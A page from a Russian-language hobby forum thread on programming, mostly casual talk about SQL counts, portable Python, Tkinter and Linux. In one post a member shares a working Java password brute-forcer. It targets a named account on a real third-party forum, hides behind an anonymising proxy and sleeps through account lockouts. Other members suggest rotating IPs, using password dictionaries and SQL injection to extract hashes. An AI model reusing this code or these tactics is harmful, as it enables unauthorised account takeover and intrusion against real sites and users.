IPB

Здравствуйте, гость ( Вход | Регистрация )

Скрыть объявления

Объявления

------------------------------------------------------------------------------------
09.08.2019 - Ввиду постоянных спамерских атак, автоматическая регистрация на форуме временно закрыта. Если Вы хотите зарегистрироваться, пожалуйста напишите на почту администратора форума (указана на странице контактов на сайте) и укажите желаемый ник и Ваш адрес электронной почты.
------------------------------------------------------------------------------------
17 страниц V  « < 12 13 14 15 16 > »   
Добавить ответ в эту темуОткрыть тему
> Программирование, Все кто могет программировать - заходи!
Brutall
сообщение 24.6.2009, 18:55
Сообщение #261


Виликае ЦлоЪ


Группа: Администратор
Сообщений: 5332
Регистрация: 25.9.2004
Из: Jotunheim
Пользователь №: 2



select top 1 id from ContactVegetables order by ID desc
что-то типа того, если top есть в твоей СУБД.


--------------------
Ведь уже на протяжении многих лет самым надежным способом выжить было быть совершенно никчемным и оставить после себя выводок столь же никчемных детей. Теперь все будет иначе.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
worldmind
сообщение 24.6.2009, 19:06
Сообщение #262


Рыцарь Порядка


Группа: Участник форума
Сообщений: 2737
Регистрация: 22.12.2005
Из: Гомель
Пользователь №: 366



А сколько такой запрос будет выполнятся, в mysql top вроде нет
mysql> select count(*) from vkontakte_count_test;
+----------+
| count(*) |
+----------+
| 36278013 |
+----------+
1 row in set (0.00 sec)

mysql> select id from vkontakte_count_test order by id desc limit 1;
+----------+
| id |
+----------+
| 36278013 |
+----------+
1 row in set (0.00 sec)

С виду разницы нет


--------------------
http://mindstate.info
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Brutall
сообщение 24.6.2009, 19:09
Сообщение #263


Виликае ЦлоЪ


Группа: Администратор
Сообщений: 5332
Регистрация: 25.9.2004
Из: Jotunheim
Пользователь №: 2



Вот! Что и требовалось доказать! Даже если это высоконагруженная система, count(*) выполняется мгновенно, и никак её не засрёт. ИМХО.


--------------------
Ведь уже на протяжении многих лет самым надежным способом выжить было быть совершенно никчемным и оставить после себя выводок столь же никчемных детей. Теперь все будет иначе.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 15.7.2009, 9:09
Сообщение #264


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Даже если Дуров писал базу сам, получить ответ сколько юзверей в базе, используя единственную переменную - ну это точно не проблема.
--------------
А теперь оприятном: в тырнете нашёл Python 2.4, Python 2.5, Python 2.6 - портируемые версии (в смысле, можно с флехи запускать). Решил остановить свой выбор на Python 2.5. Зипованный комплект (вместе с кучей компонентов) - 64 метра. Распакованный - 248. Пакеты добавляется к базовой версии методом укладывания в питоновскую папку C:\Python2.5\lib\site-package\... Создаётся папка-пакет и туда заваливается усё. Без компонентов питон весит 24 метра. Вот чего мне не хватало для моего мега-комбайна тотал-коламбур объёмом 1,4 гектара (в 7zip 480 мегабайт). Там есть всё: ОпенОфис, 7зип, ИнфраРекордер, СеаМонкей, Опера@УСБ и т. д. Кророче - это праздник!


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 17.7.2009, 8:24
Сообщение #265


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Решил себе облегчить задачу отладки написуемых программ.
Но вот незадача: в консоли венды и никсов разные кодировки сплошь и рядом.
Решение дебаггера очевидно: нарисовал окно с выводом отладки в другом потоке, и другой сессии Tk. Ел уважает только юникод. Не могу сказать что это плохо, хотя требует некоторого напряжения мозга для перекодировки. Ко всему прочему теперь я логи могу сохранять и оценивать скорость выполнения тех или иных команд. (хотя в профилировщике питона для этого имеются собственные средства)


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 28.7.2009, 8:27
Сообщение #266


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Замечательная вещь - элемент из Tkinter - Text и ScrolledText - позволяет тэгами размечать шрифт - цвет, размер, гарнитура. Ко всему прочему - можно внедрять изображения, кнопки и списки и всякую шняжку. Короче, сила. На базе текстого виджета на Питоне написан браузер Грааль. Во, мля! Пошёл качать сие чудо!


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 6.9.2009, 16:14
Сообщение #267


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Под MOPS Linux из коробки правильно настроена русская локаль+железобетонные вещи свежайшего разлива. Порадовал дистр.


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 21.2.2010, 15:52
Сообщение #268


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Увидел на днях два примера калькулятора. На Питоне, естессна.
Более сложный пример калькулятора понравился словарём со списком функций-обработчиков и указанием типов кнопок. Не понравилось: функция eval тупо считает всё, что ей скормят. Потенциально опасно.


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Brutall
сообщение 8.4.2010, 9:05
Сообщение #269


Виликае ЦлоЪ


Группа: Администратор
Сообщений: 5332
Регистрация: 25.9.2004
Из: Jotunheim
Пользователь №: 2



Пишу тут одну программку:
Код
import java.io.BufferedReader;
import java.io.FileWriter;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.Date;

public class Forcer {
    
    private static String ABC;
    private static String getTime() {
        DateFormat df = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SS");
        return df.format(new Date());
    }
    
    private static String cook;
    private static int tryPass(String pass) throws Exception{
        String data = "&" + URLEncoder.encode("UserName", "UTF-8") + "=" + URLEncoder.encode("Nick", "UTF-8");
        data += "&" + URLEncoder.encode("PassWord", "UTF-8") + "=" + URLEncoder.encode(pass, "UTF-8");
        data += "&" + URLEncoder.encode("CookieDate", "UTF-8") + "=" + URLEncoder.encode("1", "UTF-8");
        data += "&" + URLEncoder.encode("Privacy", "UTF-8") + "=" + URLEncoder.encode("1", "UTF-8");
        
        URL url = new URL("http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.angrapa.ru/forum/ipb.html?act=Login&CODE=01&CookieDate=1");
        URLConnection conn = url.openConnection();
        conn.setRequestProperty("Cookie", cook);
        conn.setDoOutput(true);
        OutputStreamWriter wr = new OutputStreamWriter(conn.getOutputStream());
        wr.write(data);
        wr.flush();
        
        //Get the response
        
        BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
        String line;
        String s=new String();
        FileWriter f = new FileWriter ("Res.html");
                
        while ((line = rd.readLine()) != null) {
            s+=line;
            f.write(line);
            f.flush();
        }
        if (s.contains("Your account will automatically be unlocked in")) {
            int pos = s.indexOf("Your account will automatically be unlocked in");
            int minutes = Integer.valueOf(s.substring(pos + 47, s.indexOf("minutes", pos)-1));
            System.out.println(getTime()+ ": " + "Account is blocked, waiting for " + minutes + " minutes");
            Thread.currentThread().sleep(1000*60*(minutes + 1));
            System.out.println(getTime()+ ": " + "Wake up!");
            return -1;
        }
        if (s.contains("Sorry, an error occurred") || s.contains("Username or password incorrect"))
            return 1;
        else return 0;
    }

    public static void main(String[] args) {
        try {
        ABC = "1234567890";
        String enLetters = "abcdefghijklmnopqrstuvwxyz";
        String rusLetters = "абвгдеёжзийклмнопрстуфхцчшщьыъэюя";
        String symbols = ".,!@#$%^&*()_+|?><~`\";/:-' ";
        ABC = ABC + enLetters + enLetters.toUpperCase() + rusLetters + rusLetters.toUpperCase() + symbols;
        URL url = new URL("http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.angrapa.ru/forum/main.html");
        
        URLConnection conn = url.openConnection();
        conn.setDoOutput(true);
        cook=new String();
        String headerName=null;
        for (int i=1; (headerName = conn.getHeaderFieldKey(i))!=null; i++) {
             if (headerName.equals("Set-Cookie")) {                  
            String cookie = conn.getHeaderField(i);
            cook+=cookie;
             }
        }
        for (int i=0; i<ABC.length();i++) {
            String pass = ABC.substring(i, i+1);
            int code;
            do {
                System.out.println(getTime()+ ": " + "Trying " + pass);
                code = tryPass(pass);
            } while (code==-1);            
            if (code==1)
                System.out.println(getTime()+ ": " + "Wrong pass " + pass);
            if (code==0) {
                System.out.println(getTime()+ ": " + pass + " - this is it!");
                break;
            }                
    
        }
                        
        } catch (Exception e) {e.printStackTrace();}
    }
}


Возникла необычная проблема, с которой я никогда не сталкивался. При чтении респонса, если не ставить
Код
f.write(line);
f.flush();

некоторые страницы отдают ровно 32768 байт. Никак не могу понять, с чем это связано, и поборол вот только с помощью такого костыля. Кто-нибудь сталкивался?

И вторая проблема - надо придумать какой-нибудь нормальный алгоритм перебора smile.gif Поищу у Кнута, может найду чего...


--------------------
Ведь уже на протяжении многих лет самым надежным способом выжить было быть совершенно никчемным и оставить после себя выводок столь же никчемных детей. Теперь все будет иначе.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Schnapz
сообщение 8.4.2010, 9:25
Сообщение #270





Группа: Администратор
Сообщений: 8450
Регистрация: 24.9.2004
Из: Черняховск || СПб
Пользователь №: 1



Цитата
некоторые страницы отдают ровно 32768 байт. Никак не могу понять, с чем это связано, и поборол вот только с помощью такого костыля. Кто-нибудь сталкивался?

Хакир мля smile.gif Ваще удивлен, что тебе вообще что-то отдается smile.gif В ИПБ-шном движке нет html-ов, и логин происходит через файл index.php, как и все остальоне практически smile.gif
Цитата
И вторая проблема - надо придумать какой-нибудь нормальный алгоритм перебора smile.gif Поищу у Кнута, может найду чего...

Ну твоя текущая прога будет лет пицот работать, патаму ша по дефолту за 3 неудачные попытки система лочит минут на 15. Количество переборов можешь сам посчитать smile.gif Делай лучше так - две попытки, смена айпишника через ананимаус, и опять. Но опять же, очень долго все это будет происходить. Попробуй заюзать словарь готовых паролей или прогу, которая может сгенерить тебе эти словари smile.gif


--------------------
"Я понял в чем ваша беда: вы слишком серьезны. Умное лицо это еще не признак ума, господа. Все глупости на Земле делаются именно с этим выражением лица... Улыбайтесь, господа, улыбайтесь!" (с) Барон Карл Фридрих Иероним фон Мюнгхаузен
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Brutall
сообщение 8.4.2010, 9:41
Сообщение #271


Виликае ЦлоЪ


Группа: Администратор
Сообщений: 5332
Регистрация: 25.9.2004
Из: Jotunheim
Пользователь №: 2



Цитата(Schnapz @ 8.4.2010, 10:25) *
Цитата
некоторые страницы отдают ровно 32768 байт. Никак не могу понять, с чем это связано, и поборол вот только с помощью такого костыля. Кто-нибудь сталкивался?

Хакир мля smile.gif Ваще удивлен, что тебе вообще что-то отдается smile.gif В ИПБ-шном движке нет html-ов, и логин происходит через файл index.php, как и все остальоне практически smile.gif

Да всё ок, так не важно, есть html или нет, мне отдаётся всё то же, что может браузеру отдаться, так что тут проблемы нет.
Цитата(Schnapz @ 8.4.2010, 10:25) *
Цитата
И вторая проблема - надо придумать какой-нибудь нормальный алгоритм перебора smile.gif Поищу у Кнута, может найду чего...

Ну твоя текущая прога будет лет пицот работать, патаму ша по дефолту за 3 неудачные попытки система лочит минут на 15. Количество переборов можешь сам посчитать smile.gif Делай лучше так - две попытки, смена айпишника через ананимаус, и опять. Но опять же, очень долго все это будет происходить. Попробуй заюзать словарь готовых паролей или прогу, которая может сгенерить тебе эти словари smile.gif

Смена айпишника не помогает, потому что блочится не айпишник, а аккаунт, как я понял. Долго работать - это да... Вообще такой вариант брутфорса без мазы, я вчера с 9 утра до 19 сидел, там прога даже этот готовый цикл по паролям длины 1 не успела закончить. А готовые словари... Ну это вариант, надо попробовать...


--------------------
Ведь уже на протяжении многих лет самым надежным способом выжить было быть совершенно никчемным и оставить после себя выводок столь же никчемных детей. Теперь все будет иначе.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
===СТАЛИНЕЦ===
сообщение 8.4.2010, 21:58
Сообщение #272


http://www.SovMusic.ru


Группа: Супермодератор
Сообщений: 2930
Регистрация: 14.10.2006
Из: ворот Кавказа.
Пользователь №: 1042



И кого вы собрались подобрать? Блондинку с готовым паролем? Нафига?


--------------------
Со смертью в человеке лишь в одном
Неравновесные процессы затухают,
Денатурируют отжившие белки,
Но мир существовать не прекращает.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Brutall
сообщение 9.4.2010, 11:42
Сообщение #273


Виликае ЦлоЪ


Группа: Администратор
Сообщений: 5332
Регистрация: 25.9.2004
Из: Jotunheim
Пользователь №: 2



Цитата(===СТАЛИНЕЦ=== @ 8.4.2010, 22:58) *
И кого вы собрались подобрать? Блондинку с готовым паролем? Нафига?

О чём ты вообще? Какие блондинки? Мы тут алгоритмы обсуждаем, программирование, о каких подборах ты говоришь?


--------------------
Ведь уже на протяжении многих лет самым надежным способом выжить было быть совершенно никчемным и оставить после себя выводок столь же никчемных детей. Теперь все будет иначе.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
===СТАЛИНЕЦ===
сообщение 9.4.2010, 18:07
Сообщение #274


http://www.SovMusic.ru


Группа: Супермодератор
Сообщений: 2930
Регистрация: 14.10.2006
Из: ворот Кавказа.
Пользователь №: 1042



Да так, ни о чём. smile.gif


--------------------
Со смертью в человеке лишь в одном
Неравновесные процессы затухают,
Денатурируют отжившие белки,
Но мир существовать не прекращает.
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Schnapz
сообщение 12.4.2010, 12:50
Сообщение #275





Группа: Администратор
Сообщений: 8450
Регистрация: 24.9.2004
Из: Черняховск || СПб
Пользователь №: 1



Цитата
Смена айпишника не помогает, потому что блочится не айпишник, а аккаунт, как я понял. Долго работать - это да... Вообще такой вариант брутфорса без мазы, я вчера с 9 утра до 19 сидел, там прога даже этот готовый цикл по паролям длины 1 не успела закончить. А готовые словари... Ну это вариант, надо попробовать...

Словарь конечно лучше и удобнее, но такой метод хака ИПБ слишком варварский и долгий smile.gif Гораздо илитнее юзать дырки в коде, подсовывать запросы например, вынимать парольцы, хэшики и прочее smile.gif
Цитата
Да всё ок, так не важно, есть html или нет, мне отдаётся всё то же, что может браузеру отдаться, так что тут проблемы нет.

Да я просто увидел, что там хтмл стоял, подумал мож в этом ошипка smile.gif


--------------------
"Я понял в чем ваша беда: вы слишком серьезны. Умное лицо это еще не признак ума, господа. Все глупости на Земле делаются именно с этим выражением лица... Улыбайтесь, господа, улыбайтесь!" (с) Барон Карл Фридрих Иероним фон Мюнгхаузен
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
worldmind
сообщение 12.4.2010, 21:29
Сообщение #276


Рыцарь Порядка


Группа: Участник форума
Сообщений: 2737
Регистрация: 22.12.2005
Из: Гомель
Пользователь №: 366



2 Brutall что-то не нравится мне твой код, сильно индюшатиной пахнет, какие-то бессмысленные циклы, я думаю надо было выделить осмысленные блоки в функции /методы, типо
сформироватьСтрокуЗапроса
выделитьВремяРазблокировки
и т.д.


--------------------
http://mindstate.info
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 26.6.2010, 13:27
Сообщение #277


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



worldmind тут прав.
Индюшатина не конченная, но на полпути - это да.
Брутфорс лучше, чем тупой перебор, но хуже чем SQL инъекция. Элементарно, нет пары скобок в запросе, и мюскля выпадает в осадок. Потроши, пока тёпленькая. НО! Не забываем и чтим уголовный кодекс. )))


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 14.11.2010, 13:35
Сообщение #278


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Месяц назад достал меня на рабочем ноуте косяк венды с автозапуском. Сел я за дженни и поймал себя на мысли: этот редактор поддерживает по умолчанию utf8. Запускаю скрипт под линем, и что я вижу? Каким-то чудом, тандербирд (виндовый) запустился из-под вайна (хотя в скрипте я не указывал, что вайн потребуется). Через три минуты я забыл, что виндовый тандербирд работает из-под вайна, так зараза вписался в систему.


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
worldmind
сообщение 14.11.2010, 15:35
Сообщение #279


Рыцарь Порядка


Группа: Участник форума
Сообщений: 2737
Регистрация: 22.12.2005
Из: Гомель
Пользователь №: 366



Цитата
Через три минуты я забыл, что виндовый тандербирд работает из-под вайна, так зараза вписался в систему.

месье знает толк в извращениях


--------------------
http://mindstate.info
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
fantom
сообщение 15.11.2010, 10:48
Сообщение #280


Близко не подходить! Шибко красный!


Группа: Участник форума
Сообщений: 2187
Регистрация: 8.6.2005
Из: Черняховск
Пользователь №: 211



Я над этим работаю. Поскольку тандербирд портируемый, я могу через скрипт копировать базу туда-сюда-обратно до и после запуска. А так получается, конечно садо-мазо с вазелином.


--------------------
Официальный сайт КПРФ: http://kprf.ru/
Сайт черняховских коммунистов: http://kprf-region39.narod.ru/
Сайт газеты "Советская Россия": http://sovross.ru/
Сайт газеты "Правда": http://gazeta-pravda.ru/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения

17 страниц V  « < 12 13 14 15 16 > » 
Добавить ответ в эту темуОткрыть тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 4.7.2020, 14:52